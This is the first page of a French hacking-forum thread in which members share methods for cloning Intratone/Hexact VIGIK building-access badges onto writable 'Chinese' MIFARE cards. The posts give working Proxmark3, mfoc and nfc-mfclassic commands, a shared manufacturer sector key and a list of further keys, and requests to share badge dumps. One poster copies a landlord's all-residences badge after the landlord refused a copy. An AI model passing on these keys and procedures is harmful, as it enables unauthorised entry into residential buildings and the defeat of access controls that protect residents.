logo

Knowledge Is Power

 
 

- Reinit des nouveaux posts -

- Recherche -

Messages Privés - Derniers posts
S'enregistrer - Login - Liste des membres
Vous logger : Login Pass

Challenges >> Challenge VIGIK Newtopic | Reply
1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | Page suivante
poster txt
grk
Inscrit le 19-03-2017
Posté le 19-03-2017 10:50

Bonjour a tous,
j'essaye depuis peu de cloner un badge intrton comme celui déjà montré dans un précédent post.
J'ai un prxmrk3 avec lequel j'ai pas mal galéré pour récuperer les clés de décryptage. les attaques nested et dark ne fonctionnaient pas (clés aleatoires).
J'ai donc snoopé les communications entre le reader et mon tag et apres plusieurs essais j'ai eu une sequence complete et j'ai pu identifier la clé A. C'était bien celle que vous avez donné... j'aurai pu gagner plusieurs jours.
J'ai ensuite installé la version iceman sur mon prxmrk et apres quelques heures j'ai récupéré les clés B de chaque secteur de mon mifare 1K.
A partir de la je dump mon badge intratone. Je le charge sur ma carte chinoise modifiable. Je réécrit le block 0 avec le bon uid et toutes les infos du block 0 du badge original.

je redumpe la carte chinoise. Je compare les deux dump hexa avec 010 Editor pour etre sur. Il ne voit aucune différence sur les 64 blocks.

J'essaye et la...diode rouge qui ne clignote pas. Mon badge ne fonctionne pas.

Si quelq'un a une idée, je suis preneur....

Badge intrton
pm3 --> hf 14a read
UID : XX XX XX XX
ATQA : 00 04
SAK : 08 [2]
TYPE : NXP MIFARE CLASSIC 1k | Plus 2k SL1
proprietary non iso14443-4 card found, RATS not supported
Answers to magic commands (GEN1): NO

Carte chinoise
pm3 --> hf 14a read
UID : XX XX XX XX (le meme)
ATQA : 00 04
SAK : 08 [2]
TYPE : NXP MIFARE CLASSIC 1k | Plus 2k SL1
proprietary non iso14443-4 card found, RATS not supported
Answers to magic commands (GEN1): YES
profil | edit | quote
gambit
Inscrit le 26-09-2014
Posté le 19-03-2017 17:29

bonjour et bienvenue.
tout d'abord, je dois dire que je suis impressionné
par les possibilités du proxmark3.
je ne pensais pas que l'on pouvait trouver les clés
en reniflant les echanges entre un badge et une centrale.
du grand art, peux tu confirmer que ça fonctionne bien sur
des "nouveaux" badges mifare ?
que ça fonctionne aussi sur des badges chinois avec
des clés inconnues ?
navré de poser plus de questions que de pouvoir t'apporter
de réponses.
tu as 2 badges aux programmations identiques,
je veux pas te mettre en toute mais c'est forcement sur que
non vu que ça n'ouvre pas.
tu n'aurais pas un scl3711 ou un acr122 en plus de ton proxmark ?
bref, comme ça de prime abord, je ne sais pas.

ceci est un lien pour telecharger un template
pour beaucoup plus de lisibilité pour les cartes mifares
dans 010editor.
https://www.sweetscape.com/010editor/templates/files/Mifare1kTemplate.bt

[ Ce Message a été édité par: gambit le 2017-03-19 17:31 ]
profil | edit | quote
Dagobert_78
Inscrit le 19-03-2017
Posté le 19-03-2017 17:45

Bonjour à tous.

j'ai un p'tit soucis avec mon ACR122U, sous Kali 2016

Code:
root@localhost:~# nfc-list
nfc-list uses libnfc 1.7.1
error libnfc.driver.acr122_usb Unable to claim USB interface (Device or resource busy)
nfc-list: ERROR: Unable to open NFC device: acr122_usb:003:002



idem avec mfoc
Code:
root@localhost:~# mfoc -O output.txt
error libnfc.driver.acr122_usb Unable to claim USB interface (Device or resource busy)
No NFC device found.





une p'tite idée ?

[ Ce Message a été édité par: Dagobert_78 le 2017-03-19 17:46 ]
profil | edit | quote
Dagobert_78
Inscrit le 19-03-2017
Posté le 19-03-2017 18:59

Ce que je voudrais copier, c'est un badge (que j'ai en ma possession) qui ouvre tous les hall d'un bailleur HLM de Paris, valable jusqu'à fin juin 2017.

il est inclus dans une télécommande HF 868 MHz, qui ouvre tous les parking de ce bailleur. (que je cherche encore à copier)

Dans le logiciel Hexact, il est marqué comme étant "Toutes résidences"

je devrais recevoir début avril des cartes avec le block 0 modifiable (Amazon US).
profil | edit | quote
gambit
Inscrit le 26-09-2014
Posté le 19-03-2017 20:12

bonjour,

essaie un
rmmod pn533_usb
rmmod pn533
rmmod nfc
puis connecte ton lecteur.

il va sans dire que si tu arrives a faire un dump,
''je'' prends volontier si ça te derange pas de partager.
c'est quel genre de badge ? pour les prospectus ??
pour info, je ne suis pas sur paris.
merci
profil | edit | quote
grk
Inscrit le 19-03-2017
Posté le 19-03-2017 21:30

le snoop de la communication entre le badge et le lecteur avec le proxmark c'etait pour trouver la première clé A. Il s'agissait en fait de celle déja connue.
l'attaque dark ou nested ne fonctionne pas donc je pense qu'il s'agit effectivement des nouveaux intratone.
J'ai du faire une recherche de clé avec la commande hardnested sur la version iceman du firmware proxmark.
Toutes les clés A et la clé B du secteur 15 sont les mêmes. L'attaque hardnested avec la cle A 484558414354 m'a permis de trouver les clés une a une pour chaque secteur (block 3, 7, 11, ..., 59). Ca prend entre 3 et 20mn par clé.
Puis j'ai ajouté ces clés dans le fichier des clés connues et utilisé le script mfkey.lua
pm3 --> script run mfkeys.lua
Ca verifie les clé et les charge dans dumpkey.bin
Puis je dump le badge. Tout se passe bien, j'ai pu faire le dump donc les clés sont les bonnes.
J'ai pu ensuite charger hf mf restore. Puis hf mf csetblk 0 "contenu du block 0 sur la carte chinoise.
Les deux dumps du badge et de la carte sont bien les mêmes.
C'est bien un intratone en plastique noir cerclé en metal et un lecteur rond noir vigik.
Le contenu est apparement le meme mais cela ne marche pas. Diode rouge qui ne clognote pas...
Je ne sais pas quel autre paramètre peut etre vérifié.
profil | edit | quote
Dagobert_78
Inscrit le 19-03-2017
Posté le 20-03-2017 01:37

Quote:

Le 19-03-2017 20:12, gambit a écrit :
c'est quel genre de badge ? pour les prospectus ??



Non, c'est un badge que le bailleur HLM nous a fournis pour que le l'on puisse effectuer des travaux d'ascenseurs et dans les portes de Parking.
Cependant, mon chef en aurai voulus 1 également, mais le bailleur a dis "non" , donc j'ai fait une copie dans une boutique, cela m'a couté 35€.
mon précédent badge était valide 1 an, mais là, il ne l'est que de 6 mois (jusqu'à fin juin).

Quote:

Le 19-03-2017 20:12, gambit a écrit :
rmmod pn533_usb
rmmod pn533
rmmod nfc



dés que je repasse sur Kali, je test ça.
d'après quelques recherches, cela pourrais venir de règles Udev non installées. sources : http://nfc-tools.org/index.php?title=Libnfc:FAQ#Unable_to_claim_USB_interface_.28Device_or_resource_busy.29
profil | edit | quote
Dagobert_78
Inscrit le 19-03-2017
Posté le 20-03-2017 02:10

Bon, je n'ai pas eu la patience d'attendre, passage sous Kali Linux.

nikel, les rm ont permis la lecture des badges.

soucis avec la lecture via mfoc 0.10.7 , il semble ne pas trouver les clef

voila ce que ça donne :
Code:
mfoc -P 500 -O opac.dmp
Found Mifare Classic 1k tag
ISO/IEC 14443A (106 kbps) target:
ATQA (SENS_RES): 00 04
* UID size: single
* bit frame anticollision supported
UID (NFCID1): fb 95 42 2b
SAK (SEL_RES): 08
* Not compliant with ISO/IEC 14443-4
* Not compliant with ISO/IEC 18092

Fingerprinting based on MIFARE type Identification Procedure:
* MIFARE Classic 1K
* MIFARE Plus (4 Byte UID or 4 Byte RID) 2K, Security level 1
* SmartMX with MIFARE 1K emulation
Other possible matches based on ATQA & SAK values:

Try to authenticate to all sectors with default keys...
Symbols: '.' no key found, '/' A key found, '\' B key found, 'x' both keys found
[Key: ffffffffffff] -> [................]
[Key: a0a1a2a3a4a5] -> [................]
[Key: d3f7d3f7d3f7] -> [................]
[Key: 000000000000] -> [................]
[Key: b0b1b2b3b4b5] -> [................]
[Key: 4d3a99c351dd] -> [................]
[Key: 1a982c7e459a] -> [................]
[Key: aabbccddeeff] -> [................]
[Key: 714c5c886e97] -> [................]
[Key: 587ee5f9350f] -> [................]
[Key: a0478cc39091] -> [................]
[Key: 533cb6c723f6] -> [................]
[Key: 8fd0a4f256e9] -> [................]

Sector 00 - UNKNOWN_KEY [A] Sector 00 - UNKNOWN_KEY [B]
Sector 01 - UNKNOWN_KEY [A] Sector 01 - UNKNOWN_KEY [B]
Sector 02 - UNKNOWN_KEY [A] Sector 02 - UNKNOWN_KEY [B]
Sector 03 - UNKNOWN_KEY [A] Sector 03 - UNKNOWN_KEY [B]
Sector 04 - UNKNOWN_KEY [A] Sector 04 - UNKNOWN_KEY [B]
Sector 05 - UNKNOWN_KEY [A] Sector 05 - UNKNOWN_KEY [B]
Sector 06 - UNKNOWN_KEY [A] Sector 06 - UNKNOWN_KEY [B]
Sector 07 - UNKNOWN_KEY [A] Sector 07 - UNKNOWN_KEY [B]
Sector 08 - UNKNOWN_KEY [A] Sector 08 - UNKNOWN_KEY [B]
Sector 09 - UNKNOWN_KEY [A] Sector 09 - UNKNOWN_KEY [B]
Sector 10 - UNKNOWN_KEY [A] Sector 10 - UNKNOWN_KEY [B]
Sector 11 - UNKNOWN_KEY [A] Sector 11 - UNKNOWN_KEY [B]
Sector 12 - UNKNOWN_KEY [A] Sector 12 - UNKNOWN_KEY [B]
Sector 13 - UNKNOWN_KEY [A] Sector 13 - UNKNOWN_KEY [B]
Sector 14 - UNKNOWN_KEY [A] Sector 14 - UNKNOWN_KEY [B]
Sector 15 - UNKNOWN_KEY [A] Sector 15 - UNKNOWN_KEY [B]
mfoc: ERROR:

No sector encrypted with the default key has been found, exiting..



[ Ce Message a été édité par: Dagobert_78 le 2017-03-20 02:20 ]
profil | edit | quote
Dagobert_78
Inscrit le 19-03-2017
Posté le 20-03-2017 02:12

et puis :

Code:
nfc-list
nfc-list uses libnfc 1.7.1
NFC device: ACS / ACR122U PICC Interface opened
1 ISO14443A passive target(s) found:
ISO/IEC 14443A (106 kbps) target:
ATQA (SENS_RES): 00 04
UID (NFCID1): fb 95 42 2b
SAK (SEL_RES): 08


profil | edit | quote
Kigiv
Inscrit le 24-02-2016
Posté le 20-03-2017 11:13

Bonjour Dagobert_78

Ce serait intéressant de savoir quelle est la marque des lecteurs de ce bailleur.

Sinon faire le dump en entrant toutes les clés déjà publiées sur ce forum ex:

mfoc -P 500 -k 484558414354 -k 4A6352684677 -k 8829da9daf76 -k 414C41524F4E -k 021209197591 -O opac.dmp
profil | edit | quote
mikokomi
Inscrit le 13-01-2017
Posté le 20-03-2017 13:15

Bonjour a tous,

je me suis remis sur les copies de badges...

voici ce que j obtient... probleme decriture sur le block 31
MERCI

root@kali:~# sudo nfc-mfclassic W X carte-originale.dmp carte-vierge.dmp
NFC reader: ACS / ACR122U PICC Interface opened
Found MIFARE Classic card:
ISO/IEC 14443A (106 kbps) target:
ATQA (SENS_RES): 00 04
UID (NFCID1): 01 23 45 67
SAK (SEL_RES): 08
Guessing size: seems to be a 1024-byte card
Sent bits: 50 00 57 cd
Sent bits: 40 (7 bits)
Received bits: a (4 bits)
Sent bits: 43
Received bits: 0a
Writing 64 blocks |...............................failed to write trailer block 31
x!
Error: tag was removed
profil | edit | quote
mikokomi
Inscrit le 13-01-2017
Posté le 20-03-2017 17:38

Super. J'y suis enfin arrivé. Je viens de copier 2 badges vigik différent.
Je l'ai ai tester et ils ont fonctionné.
Bien content.
Je remercie tout le monde qui a contribué 💪
Comme quoi ça fait du bien du coupé un peu et de s'y remettre un peu plus tard !!!

A présent je vais essayer avec le pass EDF ...
Bonne soirée
profil | edit | quote
Dagobert_78
Inscrit le 19-03-2017
Posté le 20-03-2017 22:34

Bonsoir Kigiv
Quote:

Le 20-03-2017 11:13, Kigiv a écrit :
___________________________________________________
Bonjour Dagobert_78

Ce serait intéressant de savoir quelle est la marque des lecteurs de ce bailleur.


Si je te dit HexactSoft et HexactWeb, c'est la réponse que tu attendais ?

[ Ce Message a été édité par: Dagobert_78 le 2017-03-20 22:38 ]
profil | edit | quote
Kigiv
Inscrit le 24-02-2016
Posté le 21-03-2017 00:08

Bonjour Dagobert_78

Hexact et Intratone c'est la même maison donc la clé 484558414354 devrait fonctionner
profil | edit | quote
Dagobert_78
Inscrit le 19-03-2017
Posté le 21-03-2017 13:37

Kikou.

ça semble fonctionner avec cette clef.

j'ai été obliger d'annuler après 20 minutes de travail. je retenterais ce soir.

Les PROBE montent juqu'à combien ?

Code:
mfoc -P 500 -k 484558414354 -O opac.dmp
The custom key 0x484558414354 has been added to the default keys
Found Mifare Classic 1k tag
ISO/IEC 14443A (106 kbps) target:
ATQA (SENS_RES): 00 04
* UID size: single
* bit frame anticollision supported
UID (NFCID1): fb 95 42 2b
SAK (SEL_RES): 08
* Not compliant with ISO/IEC 14443-4
* Not compliant with ISO/IEC 18092

Fingerprinting based on MIFARE type Identification Procedure:
* MIFARE Classic 1K
* MIFARE Plus (4 Byte UID or 4 Byte RID) 2K, Security level 1
* SmartMX with MIFARE 1K emulation
Other possible matches based on ATQA & SAK values:

Try to authenticate to all sectors with default keys...
Symbols: '.' no key found, '/' A key found, '\' B key found, 'x' both keys found
[Key: 484558414354] -> [///////////////x]
[Key: ffffffffffff] -> [///////////////x]
[Key: a0a1a2a3a4a5] -> [///////////////x]
[Key: d3f7d3f7d3f7] -> [///////////////x]
[Key: 000000000000] -> [///////////////x]
[Key: b0b1b2b3b4b5] -> [///////////////x]
[Key: 4d3a99c351dd] -> [///////////////x]
[Key: 1a982c7e459a] -> [///////////////x]
[Key: aabbccddeeff] -> [///////////////x]
[Key: 714c5c886e97] -> [///////////////x]
[Key: 587ee5f9350f] -> [///////////////x]
[Key: a0478cc39091] -> [///////////////x]
[Key: 533cb6c723f6] -> [///////////////x]
[Key: 8fd0a4f256e9] -> [///////////////x]

Sector 00 - FOUND_KEY [A] Sector 00 - UNKNOWN_KEY [B]
Sector 01 - FOUND_KEY [A] Sector 01 - UNKNOWN_KEY [B]
Sector 02 - FOUND_KEY [A] Sector 02 - UNKNOWN_KEY [B]
Sector 03 - FOUND_KEY [A] Sector 03 - UNKNOWN_KEY [B]
Sector 04 - FOUND_KEY [A] Sector 04 - UNKNOWN_KEY [B]
Sector 05 - FOUND_KEY [A] Sector 05 - UNKNOWN_KEY [B]
Sector 06 - FOUND_KEY [A] Sector 06 - UNKNOWN_KEY [B]
Sector 07 - FOUND_KEY [A] Sector 07 - UNKNOWN_KEY [B]
Sector 08 - FOUND_KEY [A] Sector 08 - UNKNOWN_KEY [B]
Sector 09 - FOUND_KEY [A] Sector 09 - UNKNOWN_KEY [B]
Sector 10 - FOUND_KEY [A] Sector 10 - UNKNOWN_KEY [B]
Sector 11 - FOUND_KEY [A] Sector 11 - UNKNOWN_KEY [B]
Sector 12 - FOUND_KEY [A] Sector 12 - UNKNOWN_KEY [B]
Sector 13 - FOUND_KEY [A] Sector 13 - UNKNOWN_KEY [B]
Sector 14 - FOUND_KEY [A] Sector 14 - UNKNOWN_KEY [B]
Sector 15 - FOUND_KEY [A] Sector 15 - FOUND_KEY [B]


Using sector 00 as an exploit sector
Sector: 0, type B, probe 0, distance 19522 .....
Sector: 0, type B, probe 1, distance 33387 .....
Sector: 0, type B, probe 2, distance 27739 .....
Sector: 0, type B, probe 3, distance 34483 .....
Sector: 0, type B, probe 4, distance 30015 .....
Sector: 0, type B, probe 5, distance 39336 .....

(..........)

Sector: 0, type B, probe 57, distance 44793 .....
Sector: 0, type B, probe 58, distance 34212 .....
Sector: 0, type B, probe 59, distance 20386 .....
Sector: 0, type B, probe 60, distance 36643 .....


profil | edit | quote
Kigiv
Inscrit le 24-02-2016
Posté le 21-03-2017 14:10

Bonjour Dagobert_78

Allez voir vos MP.
profil | edit | quote
Lyle
Inscrit le 21-03-2017
Posté le 21-03-2017 15:25

Bonjour à tous,

Tout d'abord, je vous félicite/remercie pour toutes les informations que vous partagez sur le forum.
Ca m'a pas mal aidé à comprendre comment fonctionnent tous les outils mfoc, mfcuk, etc...

Pour ma part, j'ai un badge Intratone et j'ai pu le dupliquer intégralement sur un badge chinois.
J'ai comparé les dumps des 2 badges et ils sont strictement identiques.
Malheureusement, le badge copié n'est pas lu sur le lecteur de l'immeuble...

En fouillant un peu, j'ai pu voir que :

- Sur le badge d'origine
SAK : 08
Sector 0 : XXXXXXXX YY 88

- Sur le badge copié
SAK : 88
Sector 0 : XXXXXXXX YY 88

J'utilise "nfc-mfclassic" pour encoder le badge chinois mais je n'arrive jamais à avoir le SAK à 08 et le sector 0 à UID BCC 88.
J'ai soit :
- SAK = 08, Sector 0 = UID BCC 08
- SAK = 88, Sector 0 = UID BCC 88
Le SAK prend toujours la valeur du sector 0.

Savez-vous s'il est possible de n'encoder que le SAK ?
profil | edit | quote
Dagobert_78
Inscrit le 19-03-2017
Posté le 21-03-2017 16:26

mon "mfoc -P 500 -k xxxxxxxxxxxx -O opac.dmp" commence à être long.

1h20 qu'il tourne, j'en suis a 246
Code:
Sector: 0, type B, probe 246, distance xxxxx .




anormal; n'est-ce pas ?
profil | edit | quote
Dagobert_78
Inscrit le 19-03-2017
Posté le 21-03-2017 16:30

j'ai quelques clés B sous le coude, comment les incorporer dans mes lignes de commande ?
profil | edit | quote
Kigiv
Inscrit le 24-02-2016
Posté le 21-03-2017 16:40

Boujour Dagobert_78

Rentrer les 15 clés en metant dans la ligne de commande 15 fois -k xxxxxxxxxxxx

exemple:
mfoc -P 500 -k 484558414354 -k xxxxxxxxxxxx -k xxxxxxxxxxxx -k xxxxxxxxxxxx -k xxxxxxxxxxxx -O opac.dmp
profil | edit | quote
Newtopic | Reply 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | Page suivante

Online : aalizoaexukbi, adhp, Agustinbluts, AgustinPhine, Agustinwhase, agzwsoy, amixiixoyemo, axoroteso, canadian, canadian ed meds, canadian prescriptions, Cesarfew, Danielvunse, DonaldEmurb, Donaldjem, DonaldJinna, eefupeli, eribaqow, eviylmaf, FawdFrenda, gabazkazeoi, Gelfordsew, GnarHep, ikaloibopeka, ipacekaem, iradideyoi, iyogudupilo, Juanitamache, Juanitarhync, KevinCrack, northwest drugs of canada, obuborebusi, oqazavelujo, oxulihaba, pharmacy cialis, Richardtweft, Sobotapica, SonjaNuS, TerrySouff, TimothyWal, ufupupaquhek, uhevoma, uraxaregoqhox, Vtbbraics, Vtbunelay et 62 Guests


Retour Index NewFFR Repository : http://taz.newffr.com
Cagades à Stick : http://alcane.newffr.com
Forum HTML et Archive -> ici
ForumFR Sql/Xml (2006/04) (SF pas à jour du tout...) - Alive since 2001 Newffr.com
Pour toute plainte ou problème -> Contacter Borax, Hyatus, Tweakie ou Stick par message privé (ou Gueulez sur le forum :) )
Retour haut de page